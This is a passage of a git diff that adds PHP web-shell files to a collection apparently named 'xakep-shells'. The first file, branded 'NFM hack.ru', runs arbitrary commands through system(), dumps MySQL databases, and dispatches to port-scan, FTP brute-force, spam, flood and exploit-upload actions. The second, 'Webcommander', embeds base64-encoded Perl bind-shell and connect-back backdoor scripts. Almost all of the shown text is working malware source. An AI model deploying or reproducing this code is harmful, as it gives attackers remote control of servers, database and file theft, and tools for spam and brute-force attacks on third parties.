+  $rows=mysql_query("SELECT * FROM $table");
+  $numfields=mysql_num_fields($rows);
+  while ($row=mysql_fetch_array($rows)) {
+   $cptchamp=-1;
+   $firstfield=1;
+   while (++$cptchamp<$numfields) { 
+    if (!$firstfield) { $csvdump.=",";} 
+    else { $firstfield=0;}
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+   }
+   $csvdump.="\n";
+  }
+ }
+
+ @mysql_free_result($rows);
+ return $csvdump;
+} 
+
+function write_file($data) {
+ global $g_fp,$file_type;
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+ else { fwrite ($g_fp,$data); }
+}
+
+function open_file($file_name) {
+ global $g_fp,$file_type,$dbbase,$f_nm;
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); } 
+ else { $g_fp=fopen ($file_name,"w"); } 
+
+ $f_nm[]=$file_name;
+ $data="";
+ $data.="##\n";
+ $data.="## NFM hack.ru creator \n";
+ $data.="##-------------------------\n";
+ $data.="## Date:".aff_date()."\n";
+ $data.="## Base:$dbbase \n";
+ $data.="##-------------------------\n\n";
+ write_file($data);
+ unset($data);
+}
+ 
+function file_pos() {
+ global $g_fp,$file_type;
+ if ($file_type=="1") { return gztell ($g_fp); }
+ else { return ftell ($g_fp); }
+}
+ 
+function close_file() {
+ global $g_fp,$file_type;
+ if ($file_type=="1") { gzclose ($g_fp); }
+ else { fclose ($g_fp); }
+}
+
+function split_sql_file($sql) {
+ $morc=explode(";",$sql);
+ $sql="";
+ $output=array();
+ $matches=array();
+ $morc_cpt=count($morc);
+ for ($i=0;$i < $morc_cpt;$i++) {
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+   else {
+    $temp=$morc[$i].";";
+    $morc[$i]="";
+    $complete_stmt=false;
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+     if (($unescaped_quotes % 2)==1) {
+      $output[]=$temp.$morc[$j];
+      $morc[$j]="";
+      $temp="";
+      $complete_stmt=true;
+      $i=$j;
+     } else {
+      $temp.=$morc[$j].";";
+      $morc[$j]="";
+     }
+    }
+   }
+  }
+ }
+ return $output;
+} 
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+// SQL functions END
+
+// main SQL()
+function sql() {
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+ $secu_config="xtdump_conf.inc.php";
+ $dbhost=$_POST['dbhost'];
+ $dbuser=$_POST['dbuser'];
+ $dbpass=$_POST['dbpass'];
+ $dbbase=$_POST['dbbase'];
+ $tbls =$_POST['tbls'];
+ $sqlaction =$_POST['sqlaction'];
+ $secu =$_POST['secu'];
+ $f_cut =$_POST['f_cut'];
+ $max_sql =$_POST['max_sql'];
+ $opt =$_POST['opt'];
+ $savmode =$_POST['savmode'];
+ $file_type =$_POST['file_type'];
+ $ecraz =$_POST['ecraz'];
+ $f_tbl =$_POST['f_tbl'];
+ $drp_tbl=$_POST['drp_tbl'];
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-�����-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+ // SQL actions STARTS
+
+ if ($sqlaction=='save') {
+  if ($secu==1) {
+   $fp=fopen($secu_config,"w");
+   fputs($fp,"<?php\n");
+   fputs($fp,"\$dbhost='$dbhost';\n");
+   fputs($fp,"\$dbbase='$dbbase';\n");
+   fputs($fp,"\$dbuser='$dbuser';\n");
+   fputs($fp,"\$dbpass='$dbpass';\n");
+   fputs($fp,"?>");
+   fclose($fp);
+  }
+  if (!is_array($tbls)) {
+   echo $header."
+<br><center><font color=red>�� ����� �������� ������ ���� ������� ��� �������� =)</b></font></center>\n$footer";
+   exit;
+  }
+  if($f_cut==1) {
+   if (!is_numeric($max_sql)) {
+    echo $header."<br><center><font color=red><b>������.</b></font></center>\n$footer";
+    exit;
+   }
+   if ($max_sql < 200000) {
+    echo $header."<br><center><font color=red><b>���� sql ������ 200 000 ��</b></font></center>\n$footer";
+    exit;
+   }
+  } 
+ 
+  $tbl=array();
+  $tbl[]=reset($tbls);
+  if (count($tbls) > 1) {
+   $a=true;
+   while ($a !=false) {
+    $a=next($tbls);
+    if ($a !=false) { $tbl[]=$a; } 
+   }
+  }
+ 
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; } 
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+  else { exit; }
+ 
+  $fext=".".$savmode;
+  $fich=$dbbase.$fc.$fext;
+  $dte="";
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+  if ($file_type=='1') { $gz.=".gz"; }
+  $fcut=false;
+  $ftbl=false;
+  $f_nm=array();
+  if($f_cut==1) { $fcut=true;$max_sql=$max_sql;$nbf=1;$f_size=170;}
+  if($f_tbl==1) { $ftbl=true; }
+  else {
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+  }
+ 
+  $nbf=1;
+  mysql_connect($dbhost,$dbuser,$dbpass);
+  mysql_select_db($dbbase);
+  if ($fext==".sql") {
+   if ($ftbl) { 		
+    while (list($i)=each($tbl)) {
+     $temp=sqldumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut) {
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+      $nbf=0;
+      $p_sql=split_sql_file($temp);
+      while(list($j,$val)=each($p_sql)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+      }
+      close_file();
+     }
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   } else {
+    $tblsv="";
+    while (list($i)=each($tbl)) {
+     $temp=sqldumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
+      $p_sql=split_sql_file($temp);
+      while(list($j,$val)=each($p_sql)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+        write_file($val.";");
+       }
+      }
+     } else { write_file($temp); }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   }
+  }
+  else if ($fext==".csv") {
+   if ($ftbl) {
+    while (list($i)=each($tbl)) {
+     $temp=csvdumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut) {
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+      $nbf=0;
+      $p_csv=split_csv_file($temp);
+      while(list($j,$val)=each($p_csv)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+        write_file($val."\n");
+       }
+      }
+      close_file();
+     } else {
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+      write_file($temp."\n\n");
+      close_file();
+      $nbf=1;
+     }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   } else {
+    while (list($i)=each($tbl)) {
+     $temp=csvdumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
+      $p_csv=split_sql_file($temp);
+      while(list($j,$val)=each($p_csv)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+        write_file($val."\n");
+       }
+      }
+     } else { write_file($temp); }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   }
+  }
+
+  mysql_close();
+  if (!$ftbl) { close_file(); }
+
+  echo $header;
+  echo "<br><center>��� ������ � ���� ��������:<br> ".$tblsv." �������� � ���� ��������� ����:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>����</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>������</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+  reset($f_nm);
+  while (list($i,$val)=each($f_nm)) {
+   $coul='#99CCCC';
+   if ($i % 2) { $coul='#CFE3E3'; }
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+   $fz_tmp=filesize($val);
+   if ($fcut && ($fz_tmp > $max_sql)) {
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+   } else {
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." ����</font>&nbsp;</td><td></td></tr>";
+   }
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+  }
+  echo "</table><br>";
+  echo $footer;exit;
+ }
+
+ if ($sqlaction=='connect') { 
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) { 
+   echo $header."<br><center><font color=red><b>����������� �� ��������! ��������� ��������� �� ������� ������!</b></font></center>\n$footer";
+   exit;
+  }
+ 
+  if(!@mysql_select_db($dbbase)) { 
+   echo $header."<br><center><font color=red><<b>����������� �� ��������! ��������� ��������� �� ������� ������!</b></font></center>\n$footer";
+   exit;
+  }
+
+  if ($secu==1) {
+   if (!file_exists($secu_config)) {
+    $fp=fopen($secu_config,"w");
+    fputs($fp,"<?php\n");
+    fputs($fp,"\$dbhost='$dbhost';\n");
+    fputs($fp,"\$dbbase='$dbbase';\n");
+    fputs($fp,"\$dbuser='$dbuser';\n");
+    fputs($fp,"\$dbpass='$dbpass';\n");
+    fputs($fp,"?>");
+    fclose($fp);
+   }
+   include($secu_config);
+  } else {
+   if (file_exists($secu_config)) { unlink($secu_config); }
+  }
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+  $tables=mysql_list_tables($dbbase);
+  $nb_tbl=mysql_num_rows($tables);
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>�������� ������ ��� ������� ��� ��������!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='�������� ��' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>�������� ������</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  $i=0;
+  while ($i < mysql_num_rows ($tables)) {
+   $coul='#99CCCC';
+   if ($i % 2) { $coul='#CFE3E3';}
+   $tb_nom=mysql_tablename ($tables,$i);
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+   $i++;
+  }
+
+  mysql_close();
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'> 
+  ��������� � ������� csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked> 
+  ��������� � ������� Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+  ��������� ��������� � ������<br> <input type='radio' name='opt' value='2'>
+  ��������� ������ ���������<br> <input type='radio' name='opt' value='3'>
+  ��������� ������ ������<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+  �������������� ����, ���� ����������<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+  �������� ���� ����� �������� �����<br> <input type='Checkbox' name='f_tbl' value='1'> 
+  �������� ������ ������� � ��������� ����<br> <input type='Checkbox' name='f_cut' value='1'>
+  ������������ ������ ������ ����-�����: <input type='text' name='max_sql' value='200000' class=form>
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+  Gzip.<br> 
+  </td></tr></table><br><br><input type='submit' value=' ���������:) ' class=form></form></center>$footer";
+  exit;
+ }
+
+// SQL actions END
+
+ if(file_exists($secu_config)) {
+  include ($secu_config);
+  $ck="checked";
+ } else {
+  $dbhost="localhost";
+  $dbbase="";
+  $dbuser="root";
+  $dbpass="";
+  $ck="";
+ }
+ 
+ echo $header."
+<table width=620 cellpadding=0 cellspacing=0 align=center> 
+ <col width=1> 
+ <col width=600> 
+ <col width=1> 
+ <tr>
+  <td></td>
+  <td align=left class=texte>
+   <br>
+   <form action='' method='post'>
+   <input type='hidden' name='sqlaction' value='connect'> 
+   <table border=0 align=center> 
+    <col> 
+    <col align=left> 
+    <tr>
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>������� ������ ��� ����������� � mySQL �������!<br><br></td> 
+    </tr> 
+    <tr>
+     <td class=texte>����� �������:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+    </tr> 
+    <tr>
+     <td class=texte>�������� ����:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td> 
+    </tr> 
+    <tr>
+     <td class=texte>�����:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td> 
+    </tr> 
+    <tr>
+     <td class=texte>������</td> 
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td> 
+    </tr> 
+   </table> 
+   <br> <center> <br><br> 
+   <input type='submit' value=' ����������� ' class=form></center> </form> <br><br> 
+  </td> 
+  <td></td> 
+ </tr> 
+ <tr> 
+  <td height=1 colspan=3></td> 
+ </tr> 
+</table>
+</center>";
+
+}
+// SQL END
+
+/* main() */
+set_time_limit(0);
+
+if ( $action !="download") print("$HTML");
+
+if (!isset($cm)) {
+ if (!isset($action)) {
+  if (!isset($tm)) { $tm = getcwd(); }
+  $curdir = getcwd();
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>��� ������� � ����������, ������ CHMOD.</td></tr></table>");
+  getdir();
+  chdir($curdir);
+  $supsub = $gdir[$j-1];
+  if (!isset($tm) ) { $tm=getcwd();}
+  readdirdata($tm);
+ } else {
+  switch ($action) {
+   case "view":
+    viewfile($tm,$fi);
+    break;
+   case "delete":
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>���� <b>$fi</b> ������� ������.</font></center></td></tr></table>";
+    deletef($tm);
+    break;
+   case "download":
+   if (isset($fatt) && strlen($fatt)>0) {
+    $attach=$fatt; 
+    header("Content-type: text/plain"); 
+   } 
+   else {
+    $attach=$fi;
+    header("Content-type: hackru"); 
+   }
+   header("Content-disposition: attachment; filename=\"$attach\";"); 
+   readfile($tm."/".$fi);
+   break;
+   case "download_mail":
+   download_mail($tm,$fi);
+   break;
+   case "edit":
+   editfile($tm,$fi);
+   break;
+  case "save":
+   savefile($tm,$fi);
+   break;
+  case "uploadd":
+   uploadtem();
+   break;
+  case "up":
+   up($tm);
+   break;
+  case "newdir":
+   newdir($tm);
+   break;
+  case "createdir":
+   cdir($tm);
+   break;
+  case "deldir":
+   deldir();
+   break;
+  case "feedback":
+   mailsystem();
+   break;
+  case "upload":
+   upload();
+   break;
+  case "help":
+   help();
+   break;
+  case "ftp":
+   ftp();
+   break;
+  case "portscan":
+   portscan();
+   break;
+  case "sql":
+   sql();
+   break; 
+  case "tar":
+   tar();
+   break; 
+  case "bash":
+   bash();
+   break; 
+  case "passwd":
+   passwd();
+   break; 
+  case "exploits":
+   exploits($dir);
+   break;
+  case "upload_exploits":
+   upload_exploits($dir);
+   break; 
+  case "upload_exploitsp":
+   upload_exploitsp($dir);
+   break; 
+  case "arhiv":
+   arhiv($tm,$pass);
+   break; 
+  case "crypte":
+   crypte();
+   break;
+  case "decrypte":
+   decrypte();
+   break;  
+  case "brut_ftp":
+   brut_ftp();
+   break; 
+  case "copyfile":
+   copyfile($tm,$fi);
+   break; 
+  case "down":
+   down($dir);
+   break;
+  case "downfiles":
+   downfiles($dir);
+   break; 
+  case "spam":
+   spam();
+   break; 
+   case "flud":
+   flud();
+   break; 
+  case "spam1":
+   spam1($file);
+   break; 
+  case "del":
+   del();
+   break; 
+  }
+ }
+} else {
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>��������: $cm</center><pre>";
+ echo system($cm);
+ echo "</pre></td></tr></table>";
+}
+
+if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam1" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>��������� ������:</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='����' class=button1 $style_button></td></tr></form></table>";
+ $perdir = @permissions(fileperms($tm));
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>�� ���� ��������� ����� � ���� ����������</b></font></td></tr></table>";
+ if ($perdir[7] == "w" && isset($tm)) {
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>������� �������:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='����' class=button1 $style_button></td></tr></form></table>";
+ } else {
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>�� ���� ������� ����� � ���� ����������</b></td></tr></table>";
+ }
+}
+
+if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam" && $action != "spam1" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>������� ������� � Unix �������:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='����' class=button1 $style_button></td></tr></table></form>";
+}
+
+if ( $action !="download") echo nfm_copyright();
+?>
diff --git a/xakep-shells/PHP/ngh.php.php.txt b/xakep-shells/PHP/ngh.php.php.txt
new file mode 100644
index 0000000..b5e334a
--- /dev/null
+++ b/xakep-shells/PHP/ngh.php.php.txt
@@ -0,0 +1,462 @@
+<?
+/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
+
+$script = $_SERVER["SCRIPT_NAME"];
+
+/* username and pass here ***************/
+
+$user = "yourlogin";
+$pass = "yourpass";
+
+/****************************************/
+
+$login = @$_POST['login'];
+$luser = @$_POST['user'];
+$lpass = @$_POST['pass'];
+$act = @$_GET['act'];
+
+   $logo = "R0lGODlhMAAwAOYAAAAAAP////r6+jEvKzQ0NQICATc3HiAgGyoqJxsbGQ4ODXl5dPr68m1taoWFgj4+Pf39+vr6+Obm5Pj49/Ly"
+          ."8ezs693d3MXFxJaWlV5dRtDOnquphqumcCcmGrezf8G9icnFlKCdet/br9jUqePgt+fkvOTj1X94PJKLUby7sk9JHF9ZKnJrPDk4"
+          ."MEdAFD08NqqnmBUUEGxoVtnTukdFPV1cWGZlYezjxPXv2JCNgoN8ZuDcz3VvX/Dnz9vWx8fDt/jz5ZmWjrOwp/bz67mxnOrgyLu1"
+          ."p9PNwfLt41BPTamoprGYabqrkK6gh+vcwu7izOLKpObSsujVtY6Cb+nXuerZveHFnbymheTNqubQrvf18ruedvDm2LW0s9DPz/v7"
+          ."+7m5uQUFBQICAv///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+          ."AAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAGMALAAAAAAwADAAAAf/gGOCg4SFhoeIiYqLjI2OhFORUzqUOjyXlzKaMjU1SQ0L"
+          ."j4tTXWCmp6inXV1KGA6doaKIU2ACtre4uBUSXmAODhhJsoe0uca4FLxKCxcYL8OFOrXH1BQWXjYSFw4E0IPF1NQVFUkC2tzeY9K2"
+          ."BQhJDzEAAOEU5ebb3dDSCghdFBS7MDSQZ2tCriQVbJ17NkxHghwBLIDxYsFCBQtKbCAQYBBXEosCvmgLNgwAhi9dFjQgQOABKC9K"
+          ."BhpLQjGhyGY2RHVBoK1Bgi5fbHUB4KBZv4MJEiB4kKQGKFCPDkx0ICZoLgBdXM3DpQ2MkiAOFtio8SCnozBeLgDoaCyGr623/ybw"
+          ."AtMFRo6wSWg8ClMBDFxjBLxg+MtxwrULrILksNHikRgKSgjjomFhsDEtF70cSQEjyIIBjjFKvvVAgmVcE7RY23HkhxEYnx8hEB0O"
+          ."wYTTBbVoQSJhh2bXU0A3WjEAYwEXyJMnt70AQIHcWoYgQWKC9Y8UOYQrWrHihALEBFaoGJ98PIHKCjrESB1dOnUfPlpnX9T9xAkW"
+          ."MRSsYMG/f/8VBhzAnQoxtCcdF1zs4MMMM8y3HQonoMABBx+MMEIRSAQQABJFiDDCBx4sAeEKCLQ3HRIJ7sBgCI09iIIHI4ggYwk9"
+          ."1GhCCSSMAMIHH3CAgg4svDDEEECciGARDDbRYv8iK6CwxAdMpNBDCSWMEMIGGmgAAggbyJBBBiiEoEMGJqTwg3s7CGGEEzMouYgN"
+          ."OnAQQgEAENHDDTAU0IKFI2Qgz58d/JgCAA8AYagRALxQRBVNMJSIDQ4QAYM8B9yAAxEAtEACCX4moIOYChTwQgiDPkAkEIgqWgUT"
+          ."einSQA4/RAaAGAswUCoSRwCgwBEKzhBCDDRsUOqpqfbgBKuLvPqDELrOasGtQQBQww7UMpjlB4MOkMK2OSRqLLKuwhrZAzUQOmxz"
+          ."C5hgAgyZyKDBoH/++cKd4CaiLLMPVKCAtIQOga66AxUg8LsAHLDAweXOe0O9iDTgQArjBjCYPKYyi4D/uj/AsIE8IJRqKKreLtzq"
+          ."ow+PCwEDD1A8XQLSUkvCxgB4MOgLQOCAQ6o3VHHFyIjYsAArhEaghVqESlDmvgm0wDIAHYSQqs2XZuqEzjwf4rMQSrg0wT8OvGCD"
+          ."CRbskEIS+ybKAwc6/OB1jU8Y0YIMVUhxhaOIsHACByD0wMANOHqY5Y48guiBnChkwPYNTkxdBRVRZLHFkojY96IIDPQ9wt+CDz4h"
+          ."hCy0UEQRiS9OhRSNY/E4I+O9yAAJfgPugeaEs4BAB6BPPTrpWWABBRRbaLdIgAjM3sHwBxA//PG0g764FLjnvrsVS/jOSBJdDOke"
+          ."igj28MTnyi8fRem7Q2EFc/TSL5KEEdcjyIX2T2wfOhWjl667+OOTL0oSQpyIPRftu2874/J7Xv3s9wj8TUd9/Gtf7USHOyzMb4Dj"
+          ."i9791GQEIliQCEzIYAavwMErbOGDIFzCFpZAwhKWTxEdGIAKV8jCFrrwhStMhwxnSMMa2tAQgQAAOw==";
+/* bd.pl ********************************/
+   $bind = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNU"
+          ."RU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMs"
+          ."JlBGX0lORVQsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0"
+          ."KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkp"
+          ."KSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hp"
+          ."bGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZp"
+          ."bmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09O"
+          ."TiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpl"
+          ."eGl0IDA7DQp9DQp9";
+/* connectback-backdoor on perl ********/
+   $backcon = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"
+          ."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1p"
+          ."bmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIp"
+          ."IHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9J"
+          ."TkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8"
